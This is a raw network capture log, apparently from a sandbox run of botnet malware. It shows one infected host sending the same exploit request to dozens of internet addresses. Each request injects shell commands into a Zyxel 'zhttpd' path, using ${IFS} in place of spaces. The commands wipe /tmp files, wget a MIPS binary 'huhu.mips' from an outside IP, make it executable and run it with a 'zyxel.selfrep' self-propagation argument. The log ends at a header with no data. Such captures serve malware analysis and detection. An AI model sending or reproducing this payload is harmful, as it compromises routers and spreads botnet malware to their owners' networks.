                                                        Feb 2, 2024 06:21:12.986490965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5030192.168.2.144583485.165.80.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986543894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5031192.168.2.146047224.200.80.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986571074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5032192.168.2.1443054120.107.17.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986623049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5033192.168.2.1457654171.172.151.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986669064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5034192.168.2.1454026168.193.191.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986701965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5035192.168.2.1441176118.49.46.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986749887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5036192.168.2.143334869.85.22.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986785889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5037192.168.2.1453484194.147.244.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986830950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5038192.168.2.1449610174.41.161.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986879110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5039192.168.2.145347258.252.223.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986917019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5040192.168.2.1449524124.44.10.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986943960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5041192.168.2.1443116211.183.231.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986998081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5042192.168.2.1444502106.182.236.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987041950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5043192.168.2.14541528.230.46.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987093925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5044192.168.2.1434334223.133.26.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987145901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5045192.168.2.1446518162.92.230.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987190008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5046192.168.2.1455394140.233.138.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987231016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5047192.168.2.1450384132.195.58.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987284899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5048192.168.2.1456246148.3.219.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987319946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5049192.168.2.145617835.102.96.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987360954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5050192.168.2.1456862144.151.230.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987399101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5051192.168.2.143842670.117.235.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987449884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5052192.168.2.1451874149.101.252.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987498045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5053192.168.2.144469638.222.32.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987531900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5054192.168.2.145136458.21.60.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987580061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5055192.168.2.1433554204.25.247.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987617016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5056192.168.2.1439934104.31.14.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987648010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5057192.168.2.143521670.154.210.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987684011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5058192.168.2.1452012175.132.29.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987723112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5059192.168.2.143766437.53.218.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987775087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5060192.168.2.143509891.230.202.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987807035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5061192.168.2.1450228201.244.118.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987858057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5062192.168.2.1435902158.186.43.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987889051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5063192.168.2.1437760160.88.57.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987946987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5064192.168.2.145877694.218.199.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.987960100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5065192.168.2.1460300191.243.9.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988001108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5066192.168.2.1450458222.156.240.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988022089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5067192.168.2.1447468185.211.41.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988079071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5068192.168.2.143467270.2.135.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988125086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5069192.168.2.1458570212.74.96.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988163948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5070192.168.2.1438240172.78.107.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988209009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5071192.168.2.1437774104.192.89.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988238096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5072192.168.2.145384862.12.243.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988276005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5073192.168.2.1453616182.103.76.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988332987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5074192.168.2.1442856192.149.164.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988389969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5075192.168.2.145858487.125.54.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988405943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5076192.168.2.144769642.244.199.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988429070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5077192.168.2.1433740150.23.105.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988487959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5078192.168.2.145162251.50.191.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988526106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5079192.168.2.144632887.54.201.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988560915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5080192.168.2.1435818172.240.230.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988595963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5081192.168.2.1448508218.68.44.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988630056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5082192.168.2.1447854193.33.245.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988670111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5083192.168.2.145518860.67.195.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988712072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5084192.168.2.1436482109.31.170.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988739014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5085192.168.2.144063694.15.175.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988804102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5086192.168.2.1459444185.124.195.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988842010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5087192.168.2.1434770219.121.62.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988869905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5088192.168.2.145802462.44.143.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988934994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5089192.168.2.144108494.109.49.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.988971949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5090192.168.2.1439152179.215.216.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989022017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5091192.168.2.144112813.23.179.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.989039898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5092192.168.2.1448742101.160.214.140443
                                                        TimestampBytes transferredDirectionData
